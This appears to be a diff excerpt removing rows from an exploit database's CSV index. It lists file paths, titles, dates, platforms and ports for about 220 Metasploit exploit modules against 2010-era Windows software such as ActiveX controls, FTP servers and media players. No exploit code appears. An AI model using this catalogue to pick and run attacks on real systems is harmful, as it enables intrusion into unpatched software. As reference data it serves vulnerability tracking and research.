-16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption",2010-07-12,metasploit,windows,remote,0 -16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 -16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 -16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,metasploit,windows,remote,0 -16604,platforms/windows/remote/16604.rb,"WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow",2010-09-20,metasploit,windows,remote,0 -16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download",2010-09-20,metasploit,windows,remote,0 -16606,platforms/windows/local/16606.rb,"Adobe Collab.getIcon() Buffer Overflow (1)",2010-04-30,metasploit,windows,local,0 -16607,platforms/windows/remote/16607.rb,"WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16608,platforms/windows/remote/16608.rb,"Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,metasploit,windows,remote,0 -16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,metasploit,windows,local,0 -16615,platforms/windows/local/16615.rb,"Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,metasploit,windows,local,0 -16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16617,platforms/windows/local/16617.rb,"VUPlayer - M3U Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 - PLF Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table 'uniqueName' Stack Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 -16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,metasploit,windows,local,0 -16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 -16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun (2)",2010-09-25,metasploit,windows,local,0 -16623,platforms/windows/local/16623.rb,"Adobe - Doc.media.newPlayer Use After Free (2)",2010-09-25,metasploit,windows,local,0 -16624,platforms/windows/local/16624.rb,"Adobe util.printf() Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 -16625,platforms/windows/local/16625.rb,"Microsoft Excel Malformed FEATHEADER Record",2010-09-25,metasploit,windows,local,0 -16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - (PLS File) Stack Buffer Overflow",2010-01-28,metasploit,windows,local,0 -16627,platforms/windows/local/16627.rb,"UltraISO CUE File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 -16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16629,platforms/windows/local/16629.rb,"VideoLAN VLC TiVo Buffer Overflow",2011-02-02,metasploit,windows,local,0 -16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (1)",2010-09-25,metasploit,windows,local,0 -16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16634,platforms/windows/local/16634.rb,"Free Download Manager Torrent Parsing Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16635,platforms/windows/remote/16635.rb,"activePDF WebGrabber ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16636,platforms/windows/local/16636.rb,"Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16637,platforms/windows/local/16637.rb,"VideoLAN VLC MKV Memory Corruption",2011-02-08,metasploit,windows,local,0 -16638,platforms/windows/remote/16638.rb,"DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,metasploit,windows,remote,0 -16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16640,platforms/windows/local/16640.rb,"FeedDemon <= 3.1.0.12 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,metasploit,windows,remote,0 -16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote GROUPNAME Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16644,platforms/windows/local/16644.rb,"VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow",2010-04-05,metasploit,windows,local,0 -16645,platforms/windows/local/16645.rb,"URSoft W32Dasm Disassembler Function Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 -16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (2)",2010-09-25,metasploit,windows,local,0 -16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,metasploit,windows,remote,0 -16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow Exploit (SEH) (2)",2010-09-25,metasploit,windows,local,0 -16651,platforms/windows/local/16651.rb,"AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16652,platforms/windows/local/16652.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,metasploit,windows,local,0 -16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 -16654,platforms/windows/local/16654.rb,"Orbital Viewer - ORB File Parsing Buffer Overflow",2010-03-09,metasploit,windows,local,0 -16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - (PSH File) Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer Buffer Overflow",2010-12-16,metasploit,windows,local,0 -16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,metasploit,aix,dos,0 -16658,platforms/windows/local/16658.rb,"VUPlayer - CUE Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16659,platforms/aix/local/16659.rb,"Cain & Abel <= 4.9.24 - RDP Buffer Overflow",2010-11-24,metasploit,aix,local,0 -16660,platforms/windows/local/16660.rb,"Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,metasploit,windows,local,0 -16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16662,platforms/windows/local/16662.rb,"A-PDF WAV to MP3 1.0.0 - Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 -16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16666,platforms/windows/local/16666.rb,"UltraISO CCD File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 -16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution",2010-11-01,metasploit,windows,local,0 -16668,platforms/windows/local/16668.rb,"BACnet OPC Client Buffer Overflow",2010-11-14,metasploit,windows,local,0 -16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,metasploit,windows,local,0 -16671,platforms/windows/local/16671.rb,"Adobe PDF Embedded EXE Social Engineering",2010-12-16,metasploit,windows,local,0 -16672,platforms/windows/local/16672.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (2)",2010-09-25,metasploit,windows,local,0 -16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16674,platforms/windows/local/16674.rb,"Adobe Collab.collectEmailInfo() Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner (DBR File) Path Buffer Overflow",2010-09-20,metasploit,windows,local,0 -16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (2)",2011-01-08,metasploit,windows,local,0 -16677,platforms/windows/local/16677.rb,"CA Antivirus Engine CAB Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow",2010-09-20,metasploit,windows,local,0 -16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,metasploit,windows,local,0 -16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic VBP Buffer Overflow",2010-09-25,metasploit,windows,local,0 -16681,platforms/windows/local/16681.rb,"Adobe Collab.getIcon() Buffer Overflow (2)",2010-09-25,metasploit,windows,local,0 -16682,platforms/windows/local/16682.rb,"Adobe PDF Escape EXE Social Engineering (No JavaScript)",2010-12-16,metasploit,windows,local,0 -16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (hhp Project File) Buffer Overflow Exploit (3)",2010-09-25,metasploit,windows,local,0 -16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0 -16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,metasploit,windows,remote,0 -16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0 -16687,platforms/windows/local/16687.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (2)",2010-09-25,metasploit,windows,local,0 -16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - (PLS File) Stack Buffer Overflow",2010-11-24,metasploit,windows,local,0 -16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,metasploit,windows,remote,23 -16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,metasploit,windows,remote,80 -16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,metasploit,windows,remote,80 -16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,metasploit,windows,remote,3128 -16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 - 'secure' Overflow (Windows)",2010-09-20,metasploit,windows,remote,7787 -16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,metasploit,windows,remote,26000 -16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,12203 -16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,1533 -16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,metasploit,windows,remote,80 -16698,platforms/windows/remote/16698.rb,"Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,metasploit,windows,remote,0 -16699,platforms/windows/remote/16699.rb,"Outlook ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,metasploit,windows,remote,0 -16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,metasploit,windows,remote,0 -16701,platforms/windows/remote/16701.rb,"MySQL yaSSL - SSL Hello Message Buffer Overflow (Windows)",2010-05-09,metasploit,windows,remote,3306 -16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,metasploit,windows,remote,21 -16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server - Input Overflow",2010-10-05,metasploit,windows,remote,0 -16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 Password Overflow",2010-07-03,metasploit,windows,remote,0 -16707,platforms/windows/remote/16707.rb,"freeFTPd 1.0 Username Overflow",2010-07-03,metasploit,windows,remote,0 -16708,platforms/windows/remote/16708.rb,"LeapWare LeapFTP 2.7.3.600 - PASV Reply Client Overflow",2010-04-30,metasploit,windows,remote,0 -16709,platforms/windows/remote/16709.rb,"ProFTP 2.9 Banner Remote Buffer Overflow Exploit",2010-07-03,metasploit,windows,remote,0 -16710,platforms/windows/remote/16710.rb,"Trellian FTP Client 3.01 PASV Remote Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16711,platforms/windows/remote/16711.rb,"EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 -16712,platforms/windows/remote/16712.rb,"BolinTech Dream FTP Server 1.02 - Format String",2010-06-22,metasploit,windows,remote,21 -16713,platforms/windows/remote/16713.rb,"Cesar FTP 0.99g - (MKD) Command Buffer Overflow",2011-02-23,metasploit,windows,remote,0 -16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB FTP UNLOCK Overflow (Win32)",2010-10-05,metasploit,windows,remote,2100 -16715,platforms/windows/remote/16715.rb,"Serv-U FTPD - MDTM Overflow",2010-09-20,metasploit,windows,remote,21 -16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 -16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - XMD5 Overflow",2010-04-30,metasploit,windows,remote,0 -16718,platforms/windows/remote/16718.rb,"Xlink FTP Server Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16719,platforms/windows/remote/16719.rb,"WS-FTP Server 5.03 MKD Overflow",2010-10-05,metasploit,windows,remote,21 -16720,platforms/windows/remote/16720.rb,"FTP Synchronizer Professional 4.0.73.274 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16721,platforms/windows/remote/16721.rb,"FileWrangler 5.30 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16722,platforms/windows/remote/16722.rb,"Xlink FTP Client Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16723,platforms/windows/remote/16723.rb,"Vermillion FTP Daemon PORT Command Memory Corruption",2010-09-20,metasploit,windows,remote,0 -16724,platforms/windows/remote/16724.rb,"War-FTPD 1.65 - Username Overflow",2010-07-03,metasploit,windows,remote,0 -16725,platforms/windows/remote/16725.rb,"FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)",2010-11-14,metasploit,windows,remote,0 -16726,platforms/windows/remote/16726.rb,"FTPPad 1.2.0 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16727,platforms/windows/remote/16727.rb,"Sasser Worm avserve FTP PORT Buffer Overflow",2010-04-30,metasploit,windows,remote,5554 -16728,platforms/windows/remote/16728.rb,"Gekko Manager FTP Client Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16729,platforms/windows/remote/16729.rb,"SlimFTPd LIST Concatenation Overflow",2010-10-05,metasploit,windows,remote,0 -16730,platforms/windows/remote/16730.rb,"3Com 3CDaemon 2.0 FTP Username Overflow",2010-09-20,metasploit,windows,remote,0 -16731,platforms/win_x86/remote/16731.rb,"Oracle 9i XDB FTP PASS Overflow (Win32)",2010-04-30,metasploit,win_x86,remote,0 -16732,platforms/windows/remote/16732.rb,"HTTPDX - tolog() Function Format String (1)",2010-08-25,metasploit,windows,remote,0 -16733,platforms/windows/remote/16733.rb,"FileCopa FTP Server pre 18 Jul Version",2010-04-30,metasploit,windows,remote,21 -16734,platforms/windows/remote/16734.rb,"EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow",2010-08-03,metasploit,windows,remote,0 -16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,metasploit,windows,remote,0 -16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16737,platforms/windows/remote/16737.rb,"EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Win32) Stack Buffer Overflow (LIST)",2010-11-14,metasploit,windows,remote,0 -16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 PWD Remote Buffer Overflow Exploit",2010-04-30,metasploit,windows,remote,21 -16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server NLST Response Overflow",2010-11-12,metasploit,windows,remote,21 -16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 SIZE Overflow",2010-06-22,metasploit,windows,remote,0 -16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow",2010-05-09,metasploit,windows,remote,0 -16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,0 -16744,platforms/windows/remote/16744.rb,"Computer Associates License Client GETCONFIG Overflow",2010-09-20,metasploit,windows,remote,10203 -16745,platforms/windows/remote/16745.rb,"Computer Associates License Server GETCONFIG Overflow",2010-09-20,metasploit,windows,remote,10202 -16746,platforms/windows/remote/16746.rb,"SentinelLM UDP Buffer Overflow",2010-05-09,metasploit,windows,remote,5093 -16747,platforms/windows/remote/16747.rb,"Microsoft Message Queueing Service Path Overflow",2010-05-09,metasploit,windows,remote,2103 -16748,platforms/windows/remote/16748.rb,"Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",2010-07-25,metasploit,windows,remote,0 -16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface Overflow",2011-01-11,metasploit,windows,remote,0 -16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service DNS Name Path Overflow",2010-07-25,metasploit,windows,remote,0 -16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,metasploit,win_x86,remote,0 -16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,metasploit,windows,remote,80 -16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server If-Modified-Since Overflow",2010-08-25,metasploit,windows,remote,80 -16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 -16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,metasploit,windows,remote,8080 -16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,metasploit,windows,remote,80 -16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300 -16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999 -16759,platforms/win_x86/remote/16759.rb,"SHTTPD <= 1.34 - URI-Encoded POST Request Overflow (Win32)",2010-05-09,metasploit,win_x86,remote,0 -16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,metasploit,windows,remote,80 -16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - EXT.dll Buffer Overflow",2010-07-07,metasploit,windows,remote,80 -16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,metasploit,windows,remote,80 -16763,platforms/win_x86/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (Win32)",2010-04-30,metasploit,win_x86,remote,8000 -16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,metasploit,windows,remote,0 -16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM Database Parameter Overflow",2010-09-20,metasploit,windows,remote,9999 -16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,metasploit,windows,remote,8080 -16767,platforms/windows/remote/16767.rb,"IA WebMail 3.x - Buffer Overflow",2010-05-09,metasploit,windows,remote,80 -16768,platforms/windows/remote/16768.rb,"Trend Micro OfficeScan Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16769,platforms/windows/remote/16769.rb,"eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow",2010-07-13,metasploit,windows,remote,8008 -16770,platforms/windows/remote/16770.rb,"Savant 3.1 Web Server - Overflow",2010-10-04,metasploit,windows,remote,0 -16771,platforms/windows/remote/16771.rb,"EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,metasploit,windows,remote,8080 -16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,metasploit,windows,remote,80 -16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,metasploit,windows,remote,0 -16775,platforms/windows/webapps/16775.rb,"Rhinosoft Serv-U Session Cookie Buffer Overflow",2010-03-10,metasploit,windows,webapps,0 -16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin USER Buffer Overflow",2010-02-15,metasploit,windows,remote,0 -16777,platforms/windows/remote/16777.rb,"Free Download Manager Remote Control Server Buffer Overflow",2010-07-13,metasploit,windows,remote,80 -16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow",2010-12-15,metasploit,windows,remote,18881 -16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway Buffer Overflow",2010-05-09,metasploit,windows,remote,8800 -16780,platforms/cgi/webapps/16780.rb,"HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow",2010-11-11,metasploit,cgi,webapps,0 -16781,platforms/windows/remote/16781.rb,"MailEnable Authorization Header Buffer Overflow",2010-07-07,metasploit,windows,remote,0 -16782,platforms/windows/remote/16782.rb,"Apache Win32 Chunked Encoding",2010-07-07,metasploit,windows,remote,0 -16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot Overflow",2010-09-20,metasploit,win_x86,remote,0 -16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)",2010-11-22,metasploit,multiple,remote,80 -16785,platforms/windows/remote/16785.rb,"Hewlett-Packard Power Manager Administration Buffer Overflow",2010-11-24,metasploit,windows,remote,80 -16786,platforms/windows/remote/16786.rb,"PeerCast <= 0.1216 URL Handling Buffer Overflow (Win32)",2010-09-20,metasploit,windows,remote,7144 -16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 - Buffer Overflow",2010-07-14,metasploit,windows,remote,0 -16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 - Arbitrary File Upload and Execute",2010-11-24,metasploit,cfm,webapps,0 -16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload and Execute",2010-11-24,metasploit,multiple,remote,8080 -16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,metasploit,windows,dos,8080 -16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM GET Buffer Overflow",2010-05-09,metasploit,windows,remote,9999 -16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,80 -16794,platforms/windows/remote/16794.rb,"HTTPDX - tolog() Function Format String (2)",2010-08-25,metasploit,windows,remote,80 -16795,platforms/cgi/webapps/16795.rb,"HP OpenView Network Node Manager - Toolbar.exe CGI Buffer Overflow",2010-05-09,metasploit,cgi,webapps,0 -16796,platforms/windows/remote/16796.rb,"BEA Weblogic Transfer-Encoding Buffer Overflow",2010-07-08,metasploit,windows,remote,80 -16797,platforms/windows/remote/16797.rb,"HP OpenView Network Node Manager ovalarm.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16798,platforms/windows/remote/16798.rb,"Apache mod_jk 1.2.20 - Buffer Overflow",2010-07-25,metasploit,windows,remote,0 -16799,platforms/windows/remote/16799.rb,"HTTPDX h_handlepeer() Function Buffer Overflow",2010-07-26,metasploit,windows,remote,0 -16800,platforms/windows/remote/16800.rb,"Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow",2010-06-11,metasploit,windows,remote,8000 -16801,platforms/windows/remote/16801.rb,"CA iTechnology iGateway Debug Mode Buffer Overflow",2010-04-30,metasploit,windows,remote,5250 -16802,platforms/windows/remote/16802.rb,"Webster HTTP Server GET Buffer Overflow",2010-11-03,metasploit,windows,remote,0 -16803,platforms/windows/remote/16803.rb,"Alt-N SecurityGateway username Buffer Overflow",2010-07-07,metasploit,windows,remote,4000 -16804,platforms/windows/remote/16804.rb,"Belkin Bulldog Plus Web Service Buffer Overflow",2010-05-09,metasploit,windows,remote,80 -16805,platforms/windows/remote/16805.rb,"HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow",2010-05-09,metasploit,windows,remote,80 -16806,platforms/windows/remote/16806.rb,"BadBlue 2.72b PassThru Buffer Overflow",2010-07-08,metasploit,windows,remote,0 -16807,platforms/windows/remote/16807.rb,"InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow",2010-07-12,metasploit,windows,remote,57772 -16808,platforms/windows/remote/16808.rb,"NaviCOPA 2.0.1 URL Handling Buffer Overflow",2010-07-12,metasploit,windows,remote,80 -16809,platforms/win_x86/remote/16809.rb,"Oracle 9i XDB HTTP PASS Overflow (Win32)",2010-09-20,metasploit,win_x86,remote,8080 -16810,platforms/windows/remote/16810.rb,"IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow",2010-09-20,metasploit,windows,remote,443 -16811,platforms/windows/webapps/16811.rb,"TrackerCam PHP Argument Buffer Overflow",2010-05-09,metasploit,windows,webapps,8090 -16812,platforms/windows/remote/16812.rb,"MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,metasploit,windows,remote,3000 -16813,platforms/windows/remote/16813.rb,"Novell NetMail <= 3.52d NMAP STOR Buffer Overflow",2010-05-09,metasploit,windows,remote,689 -16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client Buffer Overflow",2010-06-22,metasploit,windows,remote,8300 -16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 Desktop/Server Management Overflow",2010-07-25,metasploit,windows,remote,0 -16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 Username Buffer Overflow",2010-06-22,metasploit,windows,remote,23 